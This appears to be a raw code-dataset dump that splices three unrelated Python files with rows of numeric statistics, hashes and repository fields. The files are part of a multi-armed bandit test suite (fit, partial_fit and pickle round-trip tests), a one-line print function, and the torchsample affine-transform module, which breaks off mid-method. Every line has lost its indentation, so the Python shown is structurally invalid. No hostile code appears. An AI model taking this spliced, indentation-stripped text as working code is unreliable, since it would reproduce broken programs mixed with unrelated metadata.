rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
mab.partial_fit(["A", "B"], [0, 0], [[1, 3, 1, 1, 1], [0, 0, 0, 0, 0]])
def test_partial_fit_without_fit(self):
for lp in BaseTest.lps:
mab = MAB([1, 2], lp)
mab.partial_fit([1, 2], [0, 1])
x1 = mab.predict()
mab = MAB([1, 2], lp)
mab.fit([1, 2], [0, 1])
x2 = mab.predict()
self.assertEqual(x1, x2)
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
mab.partial_fit([1, 2], [0, 1], [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
x1 = mab.predict([[0, 10, -2, 4, 2]])
mab = MAB([1, 2], para_lp)
mab.fit([1, 2], [0, 1], [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
x2 = mab.predict([[0, 10, -2, 4, 2]])
self.assertEqual(x1, x2)
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2], lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 1, 2, 3, 5],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, 0]])
x1 = mab.predict([[0, 10, -2, 4, 2]])
mab = MAB([1, 2], lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 1, 2, 3, 5],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, 0]])
x2 = mab.predict([[0, 10, -2, 4, 2]])
self.assertEqual(x1, x2)
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2], para_lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
x1 = mab.predict([[0, 0, 0, 0, 0], ])
mab = MAB([1, 2], para_lp, cp)
mab.fit([1, 2, 2], [0, 1, 0], [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
x2 = mab.predict([[0, 0, 0, 0, 0]])
self.assertEqual(x1, x2)
for cp in BaseTest.cps:
for lp in BaseTest.lps:
mab = MAB([1, 2], lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
[1, 1, 1, 1, 1],
[-3, 0, 0, -7, 0]])
x1 = mab.predict([[0, 10, -2, 4, 2]])
mab = MAB([1, 2], lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
[1, 1, 1, 1, 1],
[-3, 0, 0, -7, 0]])
x2 = mab.predict([[0, 10, -2, 4, 2]])
self.assertEqual(x1, x2)
for cp in BaseTest.cps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2], para_lp, cp)
mab.partial_fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
[1, 1, 1, 1, 1],
[-3, 0, 0, -7, 0]])
x1 = mab.predict([[0, 0, 0, 0, 0]])
mab = MAB([1, 2], para_lp, cp)
mab.fit([1, 2, 2], [0, 1, 0], [[0, 9, 2, 3, 5],
[1, 1, 1, 1, 1],
[-3, 0, 0, -7, 0]])
x2 = mab.predict([[0, 0, 0, 0, 0]])
self.assertEqual(x1, x2)
def test_partial_fit_single_row(self):
rng = np.random.RandomState(seed=9)
train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
'b': [rng.rand() for _ in range(20)],
'c': [rng.rand() for _ in range(20)],
'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
'c': [rng.rand() for _ in range(3)], 'decision': [ 1, 1, 2], 'reward': [ 0, 1, 1]})
context_columns = ['a', 'b', 'c']
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
for index, row in test_data.iterrows():
mab.predict(row[context_columns])
mab.partial_fit([row['decision']], [row['reward']], row[context_columns])
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2], lp, cp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
for index, row in test_data.iterrows():
mab.predict(row[context_columns])
mab.partial_fit([row['decision']], [row['reward']], row[context_columns])
# With neighbors based approaches it is difficult to guarantee that
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2], para_lp, cp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
for index, row in test_data.iterrows():
mab.predict(row[context_columns])
mab.partial_fit([row['decision']], [row['reward']], row[context_columns])
def test_convert_matrix(self):
a = np.array([[1, 2, 3], [2, 2, 2]])
b = [[1, 2, 3], [2, 2, 2]]
c = pd.DataFrame({'one': [1, 2, 3], 'two': [2, 2, 2]})
d = np.array([[1, 2, 3], [2, 2, 2]], order='F')
MAB._convert_matrix(None)
MAB._convert_matrix(a)
MAB._convert_matrix(b)
MAB._convert_matrix(c)
MAB._convert_matrix(c['one'])
MAB._convert_matrix(c.loc[0], row=True)
MAB._convert_matrix(d)
#################################################
# Test serialization
################################################
def test_pickle_before_fit(self):
rng = np.random.RandomState(seed=9)
train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
'b': [rng.rand() for _ in range(20)],
'c': [rng.rand() for _ in range(20)],
'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
context_columns = ['a', 'b', 'c']
for lp in BaseTest.lps:
mab = MAB([1, 2], lp)
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.fit(train_data['decision'], train_data['reward'])
new_mab.predict()
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
new_mab.predict(test_data[context_columns])
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2], lp, cp)
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
new_mab.predict(test_data[context_columns])
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2], para_lp, cp)
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
new_mab.predict(test_data[context_columns])
os.remove('mab.pkl')
def test_pickle_fitted(self):
rng = np.random.RandomState(seed=9)
train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
'b': [rng.rand() for _ in range(20)],
'c': [rng.rand() for _ in range(20)],
'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
context_columns = ['a', 'b', 'c']
for lp in BaseTest.lps:
mab = MAB([1, 2], lp)
mab.fit(train_data['decision'], train_data['reward'])
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.predict()
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.predict(test_data[context_columns])
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2], lp, cp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.predict(test_data[context_columns])
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2], para_lp, cp)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
new_mab.predict(test_data[context_columns])
os.remove('mab.pkl')
def test_pickle_fitted_reproducibility(self):
rng = np.random.RandomState(seed=9)
train_data = pd.DataFrame({'a': [rng.rand() for _ in range(20)],
'b': [rng.rand() for _ in range(20)],
'c': [rng.rand() for _ in range(20)],
'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
test_data = pd.DataFrame({'a': [rng.rand() for _ in range(3)], 'b': [rng.rand() for _ in range(3)],
'c': [rng.rand() for _ in range(3)], 'decision': [1, 1, 2], 'reward': [0, 1, 1]})
context_columns = ['a', 'b', 'c']
for lp in BaseTest.lps:
mab = MAB([1, 2, 3], lp, seed=11)
mab.fit(train_data['decision'], train_data['reward'])
p1 = mab.predict()
mab2 = MAB([1, 2, 3], lp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
p2 = new_mab.predict()
self.assertEqual(p1, p2)
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2, 3], para_lp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
p1 = mab.predict(test_data[context_columns])
mab2 = MAB([1, 2, 3], para_lp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
p2 = new_mab.predict(test_data[context_columns])
self.assertEqual(p1, p2)
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2, 3], lp, cp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
p1 = mab.predict(test_data[context_columns])
mab2 = MAB([1, 2, 3], lp, cp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
p2 = new_mab.predict(test_data[context_columns])
self.assertEqual(p1, p2)
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2, 3], para_lp, cp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
p1 = mab.predict(test_data[context_columns])
mab2 = MAB([1, 2, 3], para_lp, cp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
p2 = new_mab.predict(test_data[context_columns])
self.assertEqual(p1, p2)
os.remove('mab.pkl')
def test_pickle_fitted_reproducibile_expectations(self):
rng = np.random.RandomState(seed=9)
train_data = pd.DataFrame({'a': [0.1, 0, 0.1, 0, 0, 0.1, 0, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
'b': [0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
'c': [0, 0.1, 0.1, 0, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
'd': [0, 0.1, 0, 0, 0.1, 0, 0.1, 0, 0, 0, 0.1, 0.1, 0, 0.1, 0, 0, 0.1, 0, 0.1, 0],
'decision': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'reward': [0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1]})
test_data = pd.DataFrame({'a': [0, 0.1, 0],
'b': [0.1, 0, 0],
'c': [0, 0, 0],
'd': [0, 0, 0.1],
'decision': [1, 1, 2],
'reward': [0, 1, 1]})
context_columns = ['a', 'b', 'c', 'd']
for lp in BaseTest.lps:
mab = MAB([1, 2, 3], lp, seed=11)
mab.fit(train_data['decision'], train_data['reward'])
pe1 = mab.predict_expectations()
mab2 = MAB([1, 2, 3], lp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
pe2 = new_mab.predict_expectations()
self.assertDictEqual(pe1, pe2)
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2, 3], para_lp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
pe1 = mab.predict_expectations(test_data[context_columns])
mab2 = MAB([1, 2, 3], para_lp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
pe2 = new_mab.predict_expectations(test_data[context_columns])
self.assertListEqual(pe1, pe2)
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([1, 2, 3], lp, cp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
pe1 = mab.predict_expectations(test_data[context_columns])
mab2 = MAB([1, 2, 3], lp, cp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
pe2 = new_mab.predict_expectations(test_data[context_columns])
self.assertListEqual(pe1, pe2)
for cp in BaseTest.nps:
for para_lp in BaseTest.para_lps:
if not self.is_compatible(para_lp, cp):
continue
mab = MAB([1, 2, 3], para_lp, cp, seed=11)
mab.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
pe1 = mab.predict_expectations(test_data[context_columns])
mab2 = MAB([1, 2, 3], para_lp, cp, seed=11)
mab2.fit(train_data['decision'], train_data['reward'], train_data[context_columns])
file = open('mab.pkl', 'wb')
pickle.dump(mab2, file)
file.close()
file2 = open('mab.pkl', 'rb')
new_mab = pickle.load(file2)
file2.close()
pe2 = new_mab.predict_expectations(test_data[context_columns])
self.assertListEqual(pe1, pe2)
os.remove('mab.pkl')
| 45.417885
| 117
| 0.371392
| 10,090
| 80,753
| 2.875818
| 0.021011
| 0.053555
| 0.050867
| 0.043009
| 0.934866
| 0.929972
| 0.92432
| 0.919185
| 0.907675
| 0.897026
| 0
| 0.122786
| 0.475561
| 80,753
| 1,777
| 118
| 45.443444
| 0.562385
| 0.005783
| 0
| 0.900069
| 0
| 0
| 0.014781
| 0
| 0
| 0
| 0
| 0
| 0.068008
| 1
| 0.03331
| false
| 0
| 0.005552
| 0.000694
| 0.04025
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a04b3121ad6618272e44afe7f0cd50f0a762f16
| 80
|
py
|
Python
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 3
|
2021-03-23T05:22:29.000Z
|
2022-01-26T02:07:27.000Z
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 1
|
2021-04-06T08:06:39.000Z
|
2021-04-06T08:10:38.000Z
|
test/func_examples/a_nested_code_folder/function.py
|
gitx-io/GitFx
|
8a17215dcc955da5c557d6d7b67da4c51ad67153
|
[
"Apache-2.0"
] | 1
|
2021-08-11T17:20:54.000Z
|
2021-08-11T17:20:54.000Z
|
# GET /test/result/test_multi_code_folders
print("multi code folders is ok!")
| 16
| 42
| 0.7625
| 13
| 80
| 4.461538
| 0.692308
| 0.310345
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 80
| 4
| 43
| 20
| 0.828571
| 0.5
| 0
| 0
| 0
| 0
| 0.675676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
8a1f9c21341ccb8599175ded2bff5c5ce4d6ca4c
| 27,029
|
py
|
Python
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 1,934
|
2017-03-02T02:25:41.000Z
|
2022-03-29T16:15:19.000Z
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 96
|
2017-03-05T19:09:06.000Z
|
2022-02-04T21:37:46.000Z
|
torchsample/transforms/affine_transforms.py
|
wavepak/torchsample
|
6b366d65cd0ae97f48b4825d04a36b45aff4699a
|
[
"MIT"
] | 337
|
2017-03-02T05:55:43.000Z
|
2022-03-15T02:01:45.000Z
|
"""
Affine transforms implemented on torch tensors, and
requiring only one interpolation
"""
import math
import random
import torch as th
from ..utils import th_affine2d, th_random_choice
class RandomAffine(object):
def __init__(self,
rotation_range=None,
translation_range=None,
shear_range=None,
zoom_range=None,
interp='bilinear',
lazy=False):
"""
Perform an affine transforms with various sub-transforms, using
only one interpolation and without having to instantiate each
sub-transform individually.
Arguments
---------
rotation_range : one integer or float
image will be rotated randomly between (-degrees, degrees)
translation_range : a float or a tuple/list with 2 floats between [0, 1)
first value:
image will be horizontally shifted between
(-height_range * height_dimension, height_range * height_dimension)
second value:
Image will be vertically shifted between
(-width_range * width_dimension, width_range * width_dimension)
shear_range : float
image will be sheared randomly between (-degrees, degrees)
zoom_range : list/tuple with two floats between [0, infinity).
first float should be less than the second
lower and upper bounds on percent zoom.
Anything less than 1.0 will zoom in on the image,
anything greater than 1.0 will zoom out on the image.
e.g. (0.7, 1.0) will only zoom in,
(1.0, 1.4) will only zoom out,
(0.7, 1.4) will randomly zoom in or out
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
"""
self.transforms = []
if rotation_range is not None:
rotation_tform = RandomRotate(rotation_range, lazy=True)
self.transforms.append(rotation_tform)
if translation_range is not None:
translation_tform = RandomTranslate(translation_range, lazy=True)
self.transforms.append(translation_tform)
if shear_range is not None:
shear_tform = RandomShear(shear_range, lazy=True)
self.transforms.append(shear_tform)
if zoom_range is not None:
zoom_tform = RandomZoom(zoom_range, lazy=True)
self.transforms.append(zoom_tform)
self.interp = interp
self.lazy = lazy
if len(self.transforms) == 0:
raise Exception('Must give at least one transform parameter')
def __call__(self, *inputs):
# collect all of the lazily returned tform matrices
tform_matrix = self.transforms[0](inputs[0])
for tform in self.transforms[1:]:
tform_matrix = tform_matrix.mm(tform(inputs[0]))
self.tform_matrix = tform_matrix
if self.lazy:
return tform_matrix
else:
outputs = Affine(tform_matrix,
interp=self.interp)(*inputs)
return outputs
class Affine(object):
def __init__(self,
tform_matrix,
interp='bilinear'):
"""
Perform an affine transforms with various sub-transforms, using
only one interpolation and without having to instantiate each
sub-transform individually.
Arguments
---------
tform_matrix : a 2x3 or 3x3 matrix
affine transformation matrix to apply
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
"""
self.tform_matrix = tform_matrix
self.interp = interp
def __call__(self, *inputs):
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
interp = self.interp
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
self.tform_matrix,
mode=interp[idx])
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
class AffineCompose(object):
def __init__(self,
transforms,
interp='bilinear'):
"""
Apply a collection of explicit affine transforms to an input image,
and to a target image if necessary
Arguments
---------
transforms : list or tuple
each element in the list/tuple should be an affine transform.
currently supported transforms:
- Rotate()
- Translate()
- Shear()
- Zoom()
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
"""
self.transforms = transforms
self.interp = interp
# set transforms to lazy so they only return the tform matrix
for t in self.transforms:
t.lazy = True
def __call__(self, *inputs):
# collect all of the lazily returned tform matrices
tform_matrix = self.transforms[0](inputs[0])
for tform in self.transforms[1:]:
tform_matrix = tform_matrix.mm(tform(inputs[0]))
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
interp = self.interp
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
tform_matrix,
mode=interp[idx])
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
class RandomRotate(object):
def __init__(self,
rotation_range,
interp='bilinear',
lazy=False):
"""
Randomly rotate an image between (-degrees, degrees). If the image
has multiple channels, the same rotation will be applied to each channel.
Arguments
---------
rotation_range : integer or float
image will be rotated between (-degrees, degrees) degrees
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if true, only create the affine transform matrix and return that
if false, perform the transform on the tensor and return the tensor
"""
self.rotation_range = rotation_range
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
degree = random.uniform(-self.rotation_range, self.rotation_range)
if self.lazy:
return Rotate(degree, lazy=True)(inputs[0])
else:
outputs = Rotate(degree,
interp=self.interp)(*inputs)
return outputs
class RandomChoiceRotate(object):
def __init__(self,
values,
p=None,
interp='bilinear',
lazy=False):
"""
Randomly rotate an image from a list of values. If the image
has multiple channels, the same rotation will be applied to each channel.
Arguments
---------
values : a list or tuple
the values from which the rotation value will be sampled
p : a list or tuple the same length as `values`
the probabilities of sampling any given value. Must sum to 1.
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if true, only create the affine transform matrix and return that
if false, perform the transform on the tensor and return the tensor
"""
if isinstance(values, (list, tuple)):
values = th.FloatTensor(values)
self.values = values
if p is None:
p = th.ones(len(values)) / len(values)
else:
if abs(1.0-sum(p)) > 1e-3:
raise ValueError('Probs must sum to 1')
self.p = p
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
degree = th_random_choice(self.values, p=self.p)
if self.lazy:
return Rotate(degree, lazy=True)(inputs[0])
else:
outputs = Rotate(degree,
interp=self.interp)(*inputs)
return outputs
class Rotate(object):
def __init__(self,
value,
interp='bilinear',
lazy=False):
"""
Randomly rotate an image between (-degrees, degrees). If the image
has multiple channels, the same rotation will be applied to each channel.
Arguments
---------
rotation_range : integer or float
image will be rotated between (-degrees, degrees) degrees
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if true, only create the affine transform matrix and return that
if false, perform the transform on the tensor and return the tensor
"""
self.value = value
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
interp = self.interp
theta = math.pi / 180 * self.value
rotation_matrix = th.FloatTensor([[math.cos(theta), -math.sin(theta), 0],
[math.sin(theta), math.cos(theta), 0],
[0, 0, 1]])
if self.lazy:
return rotation_matrix
else:
outputs = []
for idx, _input in enumerate(inputs):
input_tf = th_affine2d(_input,
rotation_matrix,
mode=interp[idx],
center=True)
outputs.append(input_tf)
return outputs if idx > 1 else outputs[0]
class RandomTranslate(object):
def __init__(self,
translation_range,
interp='bilinear',
lazy=False):
"""
Randomly translate an image some fraction of total height and/or
some fraction of total width. If the image has multiple channels,
the same translation will be applied to each channel.
Arguments
---------
translation_range : two floats between [0, 1)
first value:
fractional bounds of total height to shift image
image will be horizontally shifted between
(-height_range * height_dimension, height_range * height_dimension)
second value:
fractional bounds of total width to shift image
Image will be vertically shifted between
(-width_range * width_dimension, width_range * width_dimension)
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if true, only create the affine transform matrix and return that
if false, perform the transform on the tensor and return the tensor
"""
if isinstance(translation_range, float):
translation_range = (translation_range, translation_range)
self.height_range = translation_range[0]
self.width_range = translation_range[1]
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
# height shift
random_height = random.uniform(-self.height_range, self.height_range)
# width shift
random_width = random.uniform(-self.width_range, self.width_range)
if self.lazy:
return Translate([random_height, random_width],
lazy=True)(inputs[0])
else:
outputs = Translate([random_height, random_width],
interp=self.interp)(*inputs)
return outputs
class RandomChoiceTranslate(object):
def __init__(self,
values,
p=None,
interp='bilinear',
lazy=False):
"""
Randomly translate an image some fraction of total height and/or
some fraction of total width from a list of potential values.
If the image has multiple channels,
the same translation will be applied to each channel.
Arguments
---------
values : a list or tuple
the values from which the translation value will be sampled
p : a list or tuple the same length as `values`
the probabilities of sampling any given value. Must sum to 1.
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
lazy : boolean
if true, only create the affine transform matrix and return that
if false, perform the transform on the tensor and return the tensor
"""
if isinstance(values, (list, tuple)):
values = th.FloatTensor(values)
self.values = values
if p is None:
p = th.ones(len(values)) / len(values)
else:
if abs(1.0-sum(p)) > 1e-3:
raise ValueError('Probs must sum to 1')
self.p = p
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
random_height = th_random_choice(self.values, p=self.p)
random_width = th_random_choice(self.values, p=self.p)
if self.lazy:
return Translate([random_height, random_width],
lazy=True)(inputs[0])
else:
outputs = Translate([random_height, random_width],
interp=self.interp)(*inputs)
return outputs
class Translate(object):
def __init__(self,
value,
interp='bilinear',
lazy=False):
"""
Arguments
---------
value : float or 2-tuple of float
if single value, both horizontal and vertical translation
will be this value * total height/width. Thus, value should
be a fraction of total height/width with range (-1, 1)
interp : string in {'bilinear', 'nearest'} or list of strings
type of interpolation to use. You can provide a different
type of interpolation for each input, e.g. if you have two
inputs then you can say `interp=['bilinear','nearest']
"""
if not isinstance(value, (tuple,list)):
value = (value, value)
if value[0] > 1 or value[0] < -1:
raise ValueError('Translation must be between -1 and 1')
if value[1] > 1 or value[1] < -1:
raise ValueError('Translation must be between -1 and 1')
self.height_range = value[0]
self.width_range = value[1]
self.interp = interp
self.lazy = lazy
def __call__(self, *inputs):
if not isinstance(self.interp, (tuple,list)):
interp = [self.interp]*len(inputs)
else:
